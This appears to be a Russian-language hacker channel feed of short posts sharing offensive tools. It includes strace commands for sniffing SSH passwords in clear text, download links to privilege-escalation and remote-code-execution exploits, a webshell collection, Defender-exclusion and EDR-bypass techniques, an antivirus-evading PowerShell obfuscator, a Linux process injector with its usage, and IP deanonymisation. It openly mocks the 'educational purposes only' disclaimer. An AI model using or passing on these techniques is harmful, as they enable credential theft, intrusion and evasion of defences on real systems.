Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd
pgrep -l sshd
2. Отслеживаем системные вызовы
strace -f -p <ssh_PID> -e trace=write -o capture


#ssh #sniff #password

CVE-2022-2414
Дырка в pki-core
уязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов, отправив специально созданные HTTP-запросы.

Defender Exclusions BOF
Хороший пример того, что defender отключать не обязательно, достаточно определить "исключения" ииии воспользоваться ими )))
0_щ

в предложку кстати

Ну во первых с пятницей.
А во вторых, Я тебя сука по IP вычислю
*
только для образовательных целей (нет)

#track #ip #deanon

DCOMPotato
Коллекция эксплойтов /повышения привилегий службы DCOM.
*
doownload

#exploit #dcom

Перехват системных вызовов в Windows 11 22H2 like Avast Antivirus.
Исследование, анализ и обход.
Learn

#windows #syscall #bypass

SIEM
SIEM Tactics, Techiques, and Procedures
read

Пятничная викторина )))

#docker #vuln

DirCreate2System
Получаем NT AUTHORITY\\SYSTEM
*
Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.
*
DOWNLOAD POC

#windows #escpriv #POC #system

Privilege Escalation Vulnerabilities (UNIX Insecure File Handling)
*
1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging
2. UNIX Symlink Following and Race Condition in Hardware Reporting
3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol
4. UNIX Symlink Following in Log File Creation of saposcol
5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol



#linux #privesc #sec

CVE-2022-45451
Acronis POC
download

Большая коллекция WEBSHELLS
На asp, aspx, php, jsp, pl, py, etc
download

#webshell

Super Xray
Web Vulnerability Scanner
download

#web #vuln #scanner

CVE-2022-28672
Foxit PDF Reader Remote Code Execution Exploit (NOT POC))))

Бэкдоры в FreePBX
PHP бэкдор, который добавляет своего пользователя (mgknight), удаляет законных юзеров, кодируется в base64 и переписывает .htaccess - встречайте на ваших серваках телефонии)))
Пятничное расследование читать

#freepbx #backdoor

Dirty Vanity
новая техника внедрения, злоупотребляющая Windows fork API для обхода EDR.
Слайды тут
POC тут

#windows #bypass #edr

MacDirtyCowDem
Получаем root в macOS 13.0.1 через CVE-2022-46689
exploit



#root #macos #exploit

powershell-obfuscation
Обфускатор Powershell anti-kill, простой и эффективный, проходит все VT (когда трава была зеленее)
download

linux injector

Инжектим в общие библиотеки x64 Linux. (без ptrace - а то на ptrace root права нужны, а права повышать в системе в падлу)
usage:

linux_injector <pid> <module>

Да да, все так просто, иди уже.

download

Только ВАЖНЫЕ вопросы !

#hackers #xss